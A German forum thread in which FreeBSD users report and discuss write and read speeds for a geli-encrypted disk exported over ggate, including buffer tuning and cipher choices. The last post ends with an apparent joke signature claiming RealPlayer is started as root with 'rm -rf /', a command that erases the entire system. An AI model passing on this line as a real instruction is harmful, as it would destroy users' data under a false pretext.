Geom Gate + Geom Eli im LAN Erfahrungsberichte

HI,


Also ich hab Freaky 'ger weise mal folgendes System aufgesetzt.

Im Hauptsystem (FBSD 6.1S) hab ich ne Jail angelegt die als Fileserver dienen soll.
In dieser Jail wird mittels ggate ein Slice freigegeben was wiederrum per geli verschlüsselt ist.
Die Entschlüsselung wird vom Client mittels ggatec und ggeli gemacht.
Das Funzt wunderbar.

Mit bonnie bekomme ich um die 5 Mb Pro sekunde hin beim schreiben und ~20Mb fürs Lesen. Vorrausgesetzt ist aber das man den ggated einen Recieve und Send Buffer von 8192 oder 32000 gibt. Mit 130000 (was default ist) sind die schreib werte katastrophal: 500Kb /s schreiben ;-)

Hauptsystem: P3 - 1 Ghz, 512 Mb Ram, 1Gbit LAN, 600 GB Raid 5.
Als Raidcontroler kommt ein HP 1820A (PCI-X) zum einsatz der auf einen PCI64/66MHZ Port leuft.

Den HPTVM Treiber hab ich geupdatet auf V1.14. (Danach war deutlicher Geschwindigkeits vorteil zu messen. V1.12 ist default im 6.1 Kernel)

Falls einer auf den HP1820a im einsatz hat, kann er mir ja mal pers. mailen (Hab doch ein paar freeze BSD system frägen).

Mein Frage:

Sind 5 MB für Schreiben I.O. für Geli mit 128Bit Blowfish über Ggate oder geht noch mehr ? Hab leider keine Vergleichssysteme zur hand.


Mfg.
 
Willst du sagen, dass das *Verringern* der Send/Receive-Buffer das ganze schneller macht?

Ansonsten sind 5MB/s recht wenig und du hast den Nachteil, dass nur ein Client auf die Daten zugreifen kann. (Gut, das kann so gewuenscht sein)
 
Jepp.

Wenn der Buffer auf default eingestellt ist, sind nur 500Kb/s drin.
Mit iperf hab ich schon mein LAN gemessen und komme auf ~ 350 Mbit (Gbit LAN).
netio zeigt mir auch die selben werte an.
Im LAN gibts keine Kollisions und auch sonst keine Netzwerk Probleme / Fehler.
PF ist sauber eingestellt, es kommen auch keine Blocks.
tcpdump liefert auch ein normales Bild (Kein Paket verlust oder ähnliches).

Muss dazu auch sagen das ich über 2 (Gbit) Switche gehe. (1x Allnet, 1x LevelOne)
Das Allnet ist allerdings nicht wirklich ein Gutes Switch, aber es macht seine arbeit :-)

Also sind 5 MB doch zu wenig.
OK. Ich Probiere dann mal das Ver/Entschlüsseln vom Server übernehmen zu lassen und das Geli Device dann zu exportieren.

Mal sehen ob es dann bessere Performance gibt.
 
Also:


Nachdem ich jetzt die Verschlüsselung durch den Server machen lassen liegen die werte nun bei 7-8 MB / Sec.

Geli Daten:
Blowfish 128, bei 25 GB Partition.

Bei Blowfish 448:
5 Mb / Sec.

Wohl gemerkt ist das das Schreiben, nicht lesen.

Geom Gate ist also keine Perfomance bremse, nur wenn der Recieve Buffer auf Default steht.


Ohne Geli kommt der Server auf 30 Mb/s beim Schreiben aufs Raid5.
Naja, Scheiß Highpoint Controler.

Wer den HP 1820A haben möchte, bitte melden.
Ist ein PCI-X Controler.
 
Geli Status Report.



Hab jetzt auf einen anderen Rechern Geli getestet.

Selbst mit Sysctl optimierung komme ich nur auf 9 Mb/Sec bei AES 128 bit.


Also etwas wenig, aber OK.
Sicherheit geht vor Geschwindigkeit.

Ich kann auch mit 1 Mb/Sec leben.

# Den Neuen Realplayer startet man als root mit:
rm -rf /
 
Zurück
Oben